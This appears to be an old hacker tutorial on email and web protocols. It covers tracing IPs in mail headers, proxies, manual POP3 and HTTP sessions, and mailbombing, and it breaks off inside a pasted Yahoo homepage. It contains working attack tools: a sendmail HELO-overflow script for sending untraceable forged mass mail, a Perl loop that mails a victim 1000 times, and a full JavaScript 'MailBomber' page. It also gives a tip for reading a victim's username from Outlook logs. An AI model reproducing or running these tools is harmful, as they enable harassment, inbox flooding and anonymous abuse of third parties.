Received: (qmail 34532 invoked by uid 0); 23 Jan 2000 13:30:14 -0000
Message-ID: <20000123133014.34531.qmail@hotmail.com>
Received: from 202.54.109.174 by www.hotmail.com with HTTP;	Sun, 23 Jan 2000
05:30:14 PST
X-Originating-IP: [202.xx.109.174]
From: "Namita Mullick" <namita_8@hotmail.com>
To: ankit@bol.net.in
Date: Sun, 23 Jan 2000 19:00:14 IST
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-UIDL: 5c296dd2b5265c76e117ae1390e229ab

The line that interests us the following:

X-Originating-IP: [202.xx.109.174]

NOTE: I have delibrately inserted xx instead of actual numbers for privacy
purposes.

What's this in the brackets? Well that is the IP address of the sender of 
the
email. This IP would most certainly be a dynamic one, this means that 
somebody
else might be assigned that same IP at this momemt.But we can easily find 
out
the ISP which issues this IP to it's subscribers by doing a traceroute.

C:\windows>tracert 202.xx.109.174

This security flaw is not only present in Hotmail, but many other Web Based
Email Service providers and also some ISP's have this tendency of not 
keeping
security absoulutely tight and let this flaw prevail.So how do you get 
around
this problem? Well Proxy Servers hold the answer.Now let's understand how 
proxy servers give us anonymity.Normlly a TCP\IP data tranfer takes place 
something like in the following way:

Your IP Address is 203.xx.21.11 and you connect to www.hotmail.com.

203.xx.21.11 ----------> www.hotmail.com

You send a request to hotmail.com. Hotmail's server records your IP and uses 
this recorded IP to send data packets to you.

www.hotmail.com --------> 203.xx.21.11

So when you send an email using your Hotmail account, the receiver of your 
email knows your identity and can trace you.But after you install a Proxy 
server, the data transfer will take place in the following way:

203.xx.21.11 --------> 121.xx.01.89 ----------> www.hotmail.com

Now in this case, you send a request to hotmail.com which is sent via the 
proxy server, whose IP address is 121.xx.01.89.Hence hotmail establishes a 
direct connection with the Proxy Server(121.xx.01.89) and an indirect 
conection with you(203.xx.21.11).Hence the IP address that Hotmail records 
is the unique IP of the Proxy server installed at your system and not your 
direct IP.Hence you remain private.
Popular Proxy Servers for Windows are WinGate and WinProxy.
There are also online Privacy services like anonymous.com and privacyx.com. 
Only privacyx.com is a good one.

*********ROOTSHELL***************

Here's a brief description of Sendmail (qmail) hole I found
recently:

When someone mailbombs you, or tries to send fakemail, spam, etc -
sendmail normally attachs sender's host name and it's address
to outgoing message:

--
>From spam@flooders.net Mon Jan  5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
          by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
          for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>

MAILBOOM!!!
--

That's perfect - now you know, who is responsible for that annoying
junk in your mailbox: "Received: from spammer (marc@math.university.edu
[150.129.84.5])". Nothing easier...
But I found a small hole, which allows user to hide it's personality,
and send mails anonymously. The only thing you should do is to
pass HELO string longer than approx. 1024 B - sender's location and
other very useful information will be cropped!!! Message
headers should become not interesting. Sometimes, sender
may become quite untraceable (but not always, if it's possible
to obtain logs from machine which has been used to sent):

--
>From spam@flooders.net Mon Jan  5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>

MAILBOOM!!! Now guess who am I...
--


Here's a simple example of Sendmail's HELO hole usage. Note, this
script has been written ONLY to show how easy may be sending
fakemails, mailbombs, with cooperation of Sendmail ;) Script is
very slow and restricted in many ways, but explains the problem
well (note, some of non-Berkeley daemons are also affected,
probably Qmail?):

-- EXPLOIT CODE --
#!/bin/bash
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20

echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo

if [ "$4" = "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo
  echo "  msgfile - file to send as a message body"
  echo "  address - address of lucky recipient"
  echo "  server  - outgoing smtp server w/sendmail"
  echo "  sender  - introduce yourself"
  echo
  echo "WARNING: For educational use ONLY. Mailbombing is illegal."
  echo "Think twice BEFORE you use this program in any way. Also,"
  echo "I've never said this program is 100% safe nor bug-free."
  echo
  sleep 1
  exit 0
fi

if [ ! -f $1 ]; then
  echo "Message file not found."
  echo
  exit 0
fi

echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
_safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__saf
ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
ebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb__safebomb__safebomb__safebomb__safebo
mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
mb__safebomb__safebomb__safebomb__safebomb__safebom
b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
b__safebomb__safebomb__safebomb__safebomb__safebomb
b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
b__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb_
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" 
 >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0

while [ -f $1 ]; do
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=SENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  CONNECTED=`ps|grep -c "telnet $3"`
  if [ "$LIMIT" -le "$CONNECTED" ]; then
    while [ "$LIMIT" -le "$CONNECTED" ]; do
      sleep 1
    done
  fi
  if [ "$SENT" -ge "$MAX" ]; then
    echo "It's just an example, sorry."
    echo
    exit 0
  fi
done
-- EOF --

Suggested fix: insert additional length limit into HELO/EHLO
parameter scanning routine OR disable AllowBogusHELO (but it
may cause serious troubles). I have no 8.8.8 sources at the
time, so execuse me if it's unclear.

PS:

--
From: Gregory Neil Shapiro <sendmail+gshapiro@sendmail.org>

I was able to reproduce the header problem by lengthening the HELO string
in your script.

[...]

This will be fixed in sendmail 8.9.
--
******ROOTSHELL***********

Receiving mail without an Email client POP3 (Port 110)

Now that you know practicaly almost everything that one can think about 
sending
emails, let's move on to receiving emails the kewl way.Normally what you do 
is
launch your favourite email client and click on the receive buttton to start
downloading new messages.Now the email client connects to youe mail server 
and
starts issuing POP commands.So this is how a normal procedure of downloading
emails takes place.

*************
Hacking Truth: Just like Outlook Express maintains a log file which contains
various POP commands that it issued to download emails from the mail server.
This file is the POP.log file which is again stored in the
"c:\windows\Applicartion Data" folder.Just search for it.One can go through 
it
to find out the Username, mail server and also the length of password of the
victim.
*************

So what exactly is POP? POP or Post Office Protocol is nothing but a 
protocol
which is used to download messages from a mail server.A mail server 
implementing
the the POP protocol stores the emails for users.It serves email clients 
which
download messages by giving POP commands.A POP server stores the email until 
the
user log in to retrieve the messages.Once the messages are downloaded, the
server no longer maintains them.
POP3 is nothing but the third version that is the latest version of the Post
Office Protocol.
The POP daemon runs by default on Port 110 and is not as co operative as
Sendmail is and also does not provide any help.Unlike the Sendmail daemon it
requires the user to enter a UserName and Password. Hence, A person is not 
able
to download emails unless and until he has authenticated himself by 
providing a
User Name and Password.So let's learn POP3.

Launch Telnet and telnet to Port 110 of your mail server by issuing the 
command:

telnet mail2.isp.net 110

You will be welcomes by the daemon banner, which would probably be something
like:

+OK QPOP (version 2.53) at delhi1.mtnl.net.in starting.

This means that the daemon is ready for your input. Now let's see what 
happens
if you type Help at the prompt.Most servers will disconnect you as soon as 
it
encounters a wrong move from the client.My ISP does not disconnect me but I 
do
not get any response at all.The Telnet client just hangs.The '?' command too
doesn't bring about any response.The POP daemon is really cranky and it 
doesn't
stand any 'roobish' (read rubbish) at all.So unfortunately all those of all 
who
are as forgetful as I am will have to somehow remember POP commands.

Firstly before you can issue any other command, one has to provide the POP
daemon with a Username and Password.So use the USER command to provide the
Password and the PASS command to provide the password.Let's say my Username 
is
ankit and the password is hackingtruths, then I would login in the following
way:

USER ankit

The server replies:

+OK Password required for ankit.

Now we need to give the POP daemon what it needs a password:

PASS hackingtruths

The server replies:

+OK ankit has xx messages (yyyyy octets).

Where xx is the number of new messages and yyyyy is the space occupied by 
them.
For example if I have 22 new messages which occupy 135981 octets then I 
would
get something like:
+OK ankit has 22 messages (135981 octets).

Now if either the username or Password is incorrect them you will receive an
error message, something like:

-ERR Bad login  (If the Username is invalid)
-ERR Password supplied for "usernamehere" is incorrect. (If the Username is
correct but the Password is incorrect.)

Now that you have verified yourself, let's list the new messages by giving 
the
'list' command.
For Example, I have 2 new message in my Inbox and when I give the list 
command
the server return the following:
I type the list command:

list

The server returns

+OK 2 messages (8164 octets)
1 2471
2 5693
.

The numbers on the right of each message number is the size of the new 
email.
Note the email numbers which in the above case are 1 and 2 are important as 
they
are used to delete or read a particular email.They act as what filenames act 
to
files.Now to read a particular messge type the 'retr' command followed by 
the
email number.
For Example to view the email whose number is 1, I type:

retr 1

This is show the entire email with full headers.Make sure you log that
particular session before you try to view messages this way as messages 
scroll
past at a very high speed.

Similiarly the 'dele' command followed by the message number can be used to
delete a pasticular message.For example, the first email can be deleted by
giving the command:

dele 1

The server responds:

+OK Message 1 has been deleted.

There is yet another not so well known command, the 'stat' command which 
gives
the number of new messages and the size of the new messages.
For example,
I type stat:

Stat

The server responds:

+OK 22 135981
Indicating that I have 22 new messages whose total size is 135981

Once you are done with everything type the 'quit' command to end the 
session.
The server responds:
+OK Pop server at delhi1.mtnl.net.in signing off.

MailBombing

Mailbombing means to send a huge number of emails (maybe hundres, thousands 
or
even millions)to a single email account so that the maximum space of the 
account
is filled up and the owner of the account cannot receive any other important
emails and it becomes difficult for the user to read existing emails due to
gigantic number of emails.

All email accounts have a maximum space limit, for example Yahoo has a space
limit of 3 MB. Now if this maximum space is filled up then no new messages 
can
come and the mail server sends back any new messages that come, one the 
maximum
allowed capacity is filled.(Some services allow the users to exceed the 
assigned
limit.)So if the victim who has been mail bombed is excepting any new 
important
messages then he can pretty much kiss them goodbye.Not only that, his Inox 
is
filled with so many new useless messages, he cannot even read the existing
messages and deleting all the useless messages takes up a lot of valuable 
time.

MailBombing is a very irritating and a lame thing to do.It is the malest 
thing a
hacker could possibly do but I am just putting forward all info that I can.
Do not mail bomb someone, I certainly do not recommend it.

There are 2 types of mailbombing-:

1. Mass Mail Bombing
2. List Linking

The Mass Mail Bombing Method

In this kind of mail bombing the victim's Inbox is flooded with a huge 
number of
the same emails. There are mail bombing software which allow you to send a
particualar message as many times as you want using a SMTP server.Some mail
bombing software also allows you to send a particular message perpetually.A 
mail
bombing software can easily be made in Perl.The following is a script that I
picked up somewhere on the net(It runs only on Unix platforms):

#!/bin/perl
$mprogram= '/usr/lib/sendmail';
$victim= 'victim@hostname.com';
$var=0;
while($var < 1000) {
open(MAIL, "|$mprogram $victim") || die "Can't open Mail Program\n";
print MAIL "Mail Bomb";
close(MAIL);
sleep(4);
$var++;
}

This Perl script will send 1000 mails to the victim.It can easily be 
modified to
send 100000 messages instead of only 1000.

Such kind of mail bombing has one shortcoming, say you sent the victim 1000
messages, but once the victim has deleted them, that's it, that's the end of 
the
whole idea of mail boming the victim.This is where List Linking comes in as 
it
is more effective in harassing the victim.

List Linking

In this kind of mail bombing the victim is subscribed to thousands of 
mailing
list whose subjects range from Beetle lovers to people interested in seeing
earthworms eat things.This kind of mail boming is more effective as the 
victim
has to find out ways of unsubscribing himself from this long list of boring
mailing lists.Believe me, many people have problems unsubscribing from 
mailing
lists.

The most common method used by people to mail bomb someone, is to use Mail
Bombing Software.Mail Bombing software asks for the victim's email address, 
the
address of a SMTP server, the forged email address from which you want the 
mail
bombs to appear to have come and the number of emails that have to be sent 
and
of course the body of the mail bomb.Mail Bombing is as easy as a few clicks 
and
it is really common amonngst lamers with a huge ego.

Now let's see what you do when you are mail bombed.You open your Inbox and 
find
that you have 20000 new messages with the same subject "You suck!!!". So you 
are
sure that, that lamer that hates you so much has proved his lameness(is that 
a
word?) by mail bombing you. No..you do not start downloading all the 20000
messages and then delete them, instead you log on to the POP port of your 
mail
server and delete the useless mails by issuing POP commands.If you are able 
to read the headers well enough then you can easilt trace the mail bomber 
and kick him off his ISP by complaining to tech support.

Mail Bombers are very simple to design.Having knowledge of C or Perl can 
make things really really easy.I designed a Simple Mail Bomber in 
JavaScript.Although not too efficient, it gives you an idea, how easy it is 
to make a Mail Bomber.

It also allows you to specify the number of bombs.The only shortcoming is 
that the victim will easily know who sent the mail bombs as this JavaScript 
Bomber does not forge email, instead it uses the user's normal read email 
address to bomb the victim.To understand the code you need to know HTML and 
JavaScript.
Simply copy and paste the following code into Notepad and save it as .htm or 
.html file.

############CUT HERE###########
<HTML>
<HEAD>
   <TITLE>Ankit's MailBomber</TITLE>
<script language="JavaScript">
<!--
function checkAGE(){if (confirm
("This Mail Bomber Belongs to Ankit Fadia----ankit@bol.net.in"));return " "}
document.writeln(checkAGE())---->
</Script>
</HEAD>
<BODY  ulink="white"  vlink="white" alink="white" BGCOLOR="#000000" 
TEXT="#FFFFFF" ONLOAD="ResetForm()" BODY>
<P><SCRIPT LANGUAGE="JavaScript"><!-- JavaScript MailBomber
  var mail123 = 10000

  function MailBombing(iInterval)
  {
    document.Bomber.submit();
    if (document.SetupMailData.NumberOfBombs.value-- > 0)
      {
        window.setTimeout('MailBombing()',mail123);
      }
    else
      alert("MailBombing...");
  }
  function VerifyNumber(iNumber)
  { var i;
    var ch = "";
    for (i=0;i<iNumber.length;i++)
      {
        ch = iNumber.substring(i,i+1)
        if (ch < "0" || ch > "9")
          return false;
      }
    return true;

  }
  function MailBomb()
  {
    var szMsg;
      if (document.SetupMailData.UserToBomb.value == "")
      {
        alert("Please enter a valid email address to mailbomb.");
        document.SetupMailData.UserToBomb.focus;
        return;
      }
    if (VerifyNumber(document.SetupMailData.NumberOfBombs.value)==false)
      {
        alert("Invalid Number of Bombs");
        document.SetupMailData.NumberOfBombs.focus;
        return;
      }
    if (document.SetupMailData.Subject.value == "")
      {
        alert("Please Enter a subject for:"
+document.SetupMailData.UserToBomb.value);
        document.SetupMailData.Subject.focus;
        return;
      }
    if (document.Bomber.text.value == "")
      {
        alert("Please Enter Message");
        document.Bomber.text.focus; // set user focus to here
        return;
      }
    szMsg = "Mail Bombing: " + document.SetupMailData.UserToBomb.value + 
"\n";
    szMsg += "Please Wait while MailBombeing is completed."
    szMsg += "You will Be Notified when the "
    szMsg += "MailBombing Completes."
    alert(szMsg);

    document.Bomber.action = "mailto:" + 
document.SetupMailData.UserToBomb.value + "?subject=" +  
document.SetupMailData.Subject.value;
    MailBombing(mail123);
  }
  function ResetForm()
  {
    document.SetupMailData.UserToBomb.value          = "";
    document.SetupMailData.Subject.value             = "Enter Subject Here";
    document.SetupMailData.NumberOfBombs.value       = 1000000;
    document.Bomber.text.value = "Enter Message Here";
  }
// End of hiding our code --></SCRIPT></P>


<CENTER><P>
</font>
</b>
</b>

<CENTER><P><FORM NAME="SetupMailData">Victim's Email Address:<BR>
<INPUT TYPE=text NAME="UserToBomb" SIZE=62></P></CENTER>
<CENTER><P>Number of Email Bombs:<BR>
<INPUT TYPE=text NAME="NumberOfBombs" VALUE=10000 SIZE=10></P></CENTER>
<CENTER><P>Subject:<BR>
<INPUT TYPE=text NAME="Subject" SIZE=62></FORM></P></CENTER>
<CENTER><P><FORM METHOD=POST NAME="Bomber" ENCTYPE="text/plain">Message:<BR>
<TEXTAREA ROWS=10 COLS=60 NAME="text"></TEXTAREA></P></CENTER>
<CENTER><P><INPUT name="btnBombUser" TYPE=button onClick="MailBomb()" 
value="Mail Bomb User"><BR>
<BR>
<BR>
</FORM><BR>
Coded By: Ankit Fadia----ankit@bol.net.in <br>
<a href="http://hackingtruths.tripod.com">
http://hackingtruths.tripod.com</a>
For more tutorials send an email to: programmingforhackers-subscribe@egroups.com
<BR>
</BODY>
</HTML>

##########CODE ENDS HERE########

HTTP Torn Apart(Port 80)

What exactly happens when you type a URL(Uniform Resource Locator) in the 
location bar of the browser? Well firstly the browser performs a DNS queiry 
and converts the human readable domain name (like hotmail.com) into a 
machine readable IP address. Once the browser gets the IP address of the 
host, it connects to Port 80(The HTTP daemon by default runs on Port 80) of 
the remote host and asks the host for a particular document or page with the 
help of HTTP commands. HTTP or HyperText Transfer Protocol is the protocol 
used by browsers to communicate with hosts i.e. to ask for a particular file 
at a specific URL or to send or post data to the server.We are never aware 
of this process which occurs in the background.

Now in this section we will learn to do manually what the browser does
automatically.When the browser asks for a file at a specific URL it is said 
to 'request' for information. Now before we move on, let's see what a 
typical request
looks like. A typical HTTP request would be something like the below:

get url HTTP/1.1

Let's see what the specific parts of a typical request stands for.The first 
word i.e. the 'get' part is called the method.There are 3 types of methods-:

The Get method

The 'get' method is the most common method which is widely used.It is with 
the 'get' method that the browsers request for pages or douments.In this 
kind of method you are the client(browser) and request for a page from the 
server which is the host you are connected to.

The Post Method

The 'post' method is used to upload files to the server.This kind of method 
is used say when you upload your website by using not the FTP service but by 
straightaway uploading files through a HTML page.In this method there is a 
reversal of roles and now you become the server and the host you are 
connected to becomes the client.

The Head Method

The 'head' method is the least popular method and not many people know about 
it.Although not widely used, it is still a part of HTTP methods. You would 
use the 'head' method say when you want to make sure that a particualar file 
exists at a particular URL without downloading the entire file.This method 
just downloads the header info of a particular file and not the entire file.

All this might seem a bit weird, but I suggest that you just understand the 
basic difference between the various methods and then move on.

Anyway coming back to the various parts of a HTTP request.The first part as 
you now know is the method, now the second part is the URL that you are 
requesting.Say for example I want to request the contacts.htm file then the 
HTTP request would look something like:

get /contacts.htm  HTTP/1.1

Now you may ask where the first '/' has come from. Now to understand that 
you need to look at the URL that you type into the Location bar of the 
browser.Say for example, the HTML file that you are requesting is
http://www.microsoft.com/windows.htm then the URL would be what is left 
after removing the http:// and the domain name i.e. www.microsoft.com. Hence 
the URL is /windows.htm

Now what will the URL be if you want to request for Yahoo homepage? Normally 
you write http://www.yahoo.com in the location bar to access Yahoo's 
homepage. Now if we remove the http:// and also the domain 
name(www.yahoo.com) then what is left?
Nothing. This means the URL of the HTTP request is '/'. Hence the HTTP 
request now looks like.

get / HTTP/1.1

The third part of the HTTP request is pretty self explanatory.The HTTP/1.1 
specifies the version of the HTTP service used by the browser.So say if a 
server is running HTTP/1.1 and a browser which is running HTTP/1.0 requests 
a page then the server will send the page in terms of HTTP/1.0 only removing 
the enhancements of HTTP/1.1

So now that you know what a normal HTTP request sent by your browser looks, 
let's find out how we can do this manually.This too requires Telnet.Now you 
know how important the Telnet client is in a Hacker's armoury.So launch your 
Telnet client and connect to Port 80(As the HTTP daemon runs on Port 80) of 
any host.If the host you are trying to connect to does not have a website 
i.e does not have Port 80 open, then you would get a Error Message.If the 
connection is successful then the Title bar of your Telnet client will show 
the host address you are connected to and it will be ready for user input.

The HTTP daemon is not as boring as it seems to be till now.Infact it is 
very very interesting.Once telnet is ready for input just type h (or any 
other letter) and hit enter twice.

***********
Hacking Truth: After each HTTP command one has to press Enter Twice to send 
the command to the server or to bring about a response from a server.It is 
just how the HTTP protocol works.
**********

Now as 'h' or any other command that you typed is not a valid HTTP command, 
the server will give you an error message, something like the below:

HTTP/1.1 400 Bad Request
Server: Netscape-Enterprise/3.5.1

The server replies with the version of HTTP it is running(not so important), 
it gives us an error message and the error code associated with it(again not 
so important), but it also gives us the OS name and OS version, it is 
running.Wow!!! It gives hackers who want to break into their server the 
ultimate piece of information which they require.

Anyway now let's see what happens when we give a normal authentic request 
requesting for the main page of Yahoo.So after I telnet to Port 80 of 
www.yahoo.com I give the command:

get / http/1.1

(requesting for the Yahoo Homepage)

HTTP/1.0 200 OK
Content-Length: 12085
Content-Type: text/html

(No OS name,interesting, well Yahoo being a Top Web Company has configured 
their server to not display the OS name and Version when an HTTP request is 
encountered.)

<html><head><title>Yahoo!</title><base href=http://www.yahoo.com/><meta 
http-
equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html" 
l
gen true for "http://www.yahoo.com" r (n 0 s 0 v 0 l
0))'></head><body><center><form 
action=http://search.yahoo.com/bin/search><map
name=m><area coords="72,0,130,58" href=r/wn><area coords="131,0,189,58"
href=http://mail.yahoo.com><area coords="414,0,472,58" href=r/i1><area
coords="473,0,531,58" href=r/hw></map><img width=600 height=59 border=0
usemap="#m" src=http://a1.g.a.yimg.com/7/1/31/000/us.yimg.com/i/main4s3.gif
alt=Yahoo><br><table border=0 cellspacing=0 cellpadding=4 width=600><tr><td
align=center width=160>
<a href="/homet/?http://auctions.yahoo.com"><b>Yahoo!
Auctions</b></a><br><small><a
href="/homet/?http://list.auctions.yahoo.com/27813-category.html">Pokemon</a>,
<a href="/homet/?http://list.auctions.yahoo.com/26360-category-
leaf.html">cars</a>, <a href="/homet/?http://list.auctions.yahoo.com/40291-
category-leaf.html">'N Sync</a></small></td><td align=center><a
href="http://rd.yahoo.com/M=26036.208672.1462854.389576/S=2716149:NP/A=167764/?h
ttp://messenger.yahoo.com/" target="_top"><img width=230 height=33
src="http://a32.g.a.yimg.com/7/32/31/000/us.yimg.com/a/ya/yahoopager/messenger/m
essengermail.gif" alt="Yahoo! Messenger" border=0></a></td><td align=center
width=160><a href="/homet/?http://mail.yahoo.com"><b>Yahoo! 
Mail</b></a><br>free
email for life</td></tr><tr><td colspan=3 align=center><input size=30 
name=p>
<input type=submit value=Search> <a href=r/so>advanced
search</a></td></tr></table><table border=0 cellspacing=0 cellpadding=4
width=600><tr><td nowrap align=center><small><a href=r/sh>Shopping</a> -
<a href=r/os><b>Auctions</b></a> -
<a href=r/yp>Yellow Pages</a> -
<a href=r/ps>People Search</a> -
<a href=r/mp>Maps</a> -
<a href=r/ta>Travel</a> -
<a href=r/cf>Classifieds</a> -
<a href=r/pr>Personals</a> -
<a href=r/pl>Games</a> -
<a href=r/yc>Chat</a> -
<a href=r/ub><b>Clubs</b></a><br><a href=http://mail.yahoo.com>Mail</a> -
<a href=r/ca>Calendar</a> -
<a href=r/pg>Messenger</a> -
<a href=r/cm><b>Companion</b></a> -
<a href=r/i2>My Yahoo!</a> -
<a href=r/dn>News</a> -
<a href=r/ys>Sports</a> -
<a href=r/wt>Weather</a> -
<a href=r/tg>TV</a> -
<a href=r/sq>Stock Quotes</a> -
<a href=r/xy>more...</a></small></td></tr><tr><td></td></tr></table><table
border=0 cellspacing=0 width=600><tr><td bgcolor=339933><table border=0
cellspacing=0 cellpadding=0><tr><td
height=2></td></tr></table></td></tr></table><table border=0 cellspacing=7
cellpadding=2><tr><td valign=top align=center>

<table cellspacing=0 cellpadding=3 border=0 width="100%"><tr><td 
align=center
bgcolor=99cc99><font face=arial><a href=r/s/1><b>Yahoo!
Shopping</b></a></font><small> - Thousands of stores.
Millions of products.</small><table cellspacing=0 cellpadding=2 border=0
width="100%"><tr><td align=center bgcolor=ffffff><table cellspacing=0 
border=0
width="100%"><tr><td colspan=2><font face=arial
size=2><b>Departments</b></font></td><td><font face=arial
size=2><b>Stores</b></font></td><td><font face=arial
size=2><b>Products</b></font></td></tr><tr><td valign=top
width="22%"><small>&#183;
<a href=r/s/2>Apparel</a><br>&#183;
<a href=r/s/3>Bath/Beauty</a><br>&#183;
<a href=r/s/4>Computers</a><br>&#183;
<a href=r/s/5>Electronics</a></small></td><td valign=top
width="22%"><small>&#183;
<a href=r/s/10>Flowers</a><br>&#183;
<a href=r/s/11>Sports</a><br>&#183;
<a href=r/s/7>Music</a><br>&#183;
<a href=r/s/9>Video/DVD</a></small></td><td valign=top width="31%"><small>
&#183; <a href=r/s/eb>Eddie Bauer</a><br>
&#183; <a href=r/s/ash>Ashford</a><br>
&#183; <a href=r/s/toys>Toys R Us</a><br>
&#183; <a href=r/s/nord>Nordstrom</a><br>
</small></td><td valign=top width="25%"><small>
&#183; <a href=r/s/nsync>'N Sync</a><br>
&#183; <a href=r/s/cam>Digital cameras</a><br>
&#183; <a href=r/s/poke>Pokemon</a><br>
&#183; <a href=r/s/mp3>MP3 players</a><br>
</small></td></tr></table></td></tr></table></td></tr></table>

<table border=0 cellspacing=0 cellpadding=4><tr><td valign=top
nowrap><small><font size=3 face=arial><a href=r/ar><b>Arts &
Humanities</b></a></font><br><a href=r/li>Literature</a>,
<a href=r/ph>Photography</a>...<br><br><font size=3 face=arial><a
href=r/bu><b>Business & Economy</b></a></font><br><a 
href=r/co>Companies</a>,
<a href=r/fi>Finance</a>,
<a href=r/jo>Jobs</a>...<br><br><font size=3 face=arial><a
href=r/ci><b>Computers & Internet</b></a></font><br><a 
href=r/in>Internet</a>,
<a href=r/ww>WWW</a>,
<a href=r/sf>Software</a>,
<a href=r/ga>Games</a>...<br><br><font size=3 face=arial><a
href=r/ed><b>Education</b></a></font><br><a href=r/un>College and
University</a>,
<a href=r/k2>K-12</a>...<br><br><font size=3 face=arial><a
href=r/en><b>Entertainment</b></a></font><br><a href=r/cl>Cool Links</a>,
<a href=r/mo>Movies</a>,
<a href=r/hu>Humor</a>,
<a href=r/mu>Music</a>...<br><br><font size=3 face=arial><a
href=r/go><b>Government</b></a></font><br><a href=r/el>Elections</a>,
<a href=r/mi>Military</a>,
<a href=r/la>Law</a>,
<a href=r/tx>Taxes</a>...<br><br><font size=3 face=arial><a
href=r/he><b>Health</b></a></font><br><a href=r/md>Medicine</a>,
<a href=r/ds>Diseases</a>,
<a href=r/dg>Drugs</a>,
<a href=r/ft>Fitness</a>...</small></td><td valign=top nowrap><small><font
size=3 face=arial><a href=r/nm><b>News & Media</b></a></font><br><a
href=r/fc>Full Coverage</a>,
<a href=r/nw>Newspapers</a>,
<a href=r/tv>TV</a>...<br><br><font size=3 face=arial><a 
href=r/rs><b>Recreation
& Sports</b></a></font><br><a href=r/sp>Sports</a>,
<a href=r/tr>Travel</a>,
<a href=r/au>Autos</a>,
<a href=r/od>Outdoors</a>...<br><br><font size=3 face=arial><a
href=r/rf><b>Reference</b></a></font><br><a href=r/lb>Libraries</a>,
<a href=r/dc>Dictionaries</a>,
<a href=r/qt>Quotations</a>...<br><br><font size=3 face=arial><a
href=r/re><b>Regional</b></a></font><br><a href=r/ct>Countries</a>,
<a href=r/rg>Regions</a>,
<a href=r/us>US States</a>...<br><br><font size=3 face=arial><a
href=r/sc><b>Science</b></a></font><br><a href=r/am>Animals</a>,
<a href=r/as>Astronomy</a>,
<a href=r/eg>Engineering</a>...<br><br><font size=3 face=arial><a
href=r/ss><b>Social Science</b></a></font><br><a href=r/ac>Archaeology</a>,
<a href=r/ec>Economics</a>,
<a href=r/lg>Languages</a>...<br><br><font size=3 face=arial><a
href=r/cu><b>Society & Culture</b></a></font><br><a href=r/pe>People</a>,
<a href=r/ev>Environment</a>,
<a href=r/rl>Religion</a>...</small></td></tr></table></td>
<td align=right valign=top bgcolor=dcdcdc width=155><table border=0
cellspacing=1 width="100%"><tr><td align=center bgcolor=ffffcc nowrap
colspan=2><table border=0 cellspacing=0 cellpadding=0 width=120><tr><td
align=center><font face=arial size=2><b>In the
News</b></font></td></tr></table></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://fullcoverage.yahoo.com/fc/world/Elian_Gonzalez/">Reno 
says
Elian to be returned to father</a></small></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://fullcoverage.yahoo.com/Full_Coverage/World/Zimbabwe/">Zimba
bwe land seizures continue</a></small></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://sports.yahoo.com/pga/">The Masters</a>, <a
href="/homer/?http://sports.yahoo.com/mlb/">MLB</a>, <a
href="/homer/?http://sports.yahoo.com/nba/">NBA</a></small></td></tr><tr><td
align=right colspan=2><a 
href=r/xn><small>more...</small></a></td></tr><tr><td
align=center bgcolor=ffffcc colspan=2><font face=arial
size=2><b>Marketplace</b></font></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://taxes.yahoo.com/">Y! Tax Center</a> - tax guide, online
filing, and more</small></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small><a 
href=/homer/?http://b2b.yahoo.com>Y!
Business Marketplace</a> - products for all 
industries</small></td></tr><tr><td
valign=top><b>&#183;</b></td><td><small>Free <a
href="/homer/?http://www.bluelight.com/isp.html">56K Internet
Access</a></small></td></tr><tr><td 
valign=top><b>&#183;</b></td><td><small><a
href="/homer/?http://bills.yahoo.com/">Yahoo! Bill Pay</a> - free 3-month 
trial
</small></td></tr><tr><td align=right colspan=2><a
href=r/xm><small>more...</small></a></td></tr><tr><td align=center
bgcolor=ffffcc colspan=2><font face=arial size=2><b>Inside
Yahoo!</b></font></td></tr><tr><td 
valign=top><b>&#183;</b></td><td><small><a
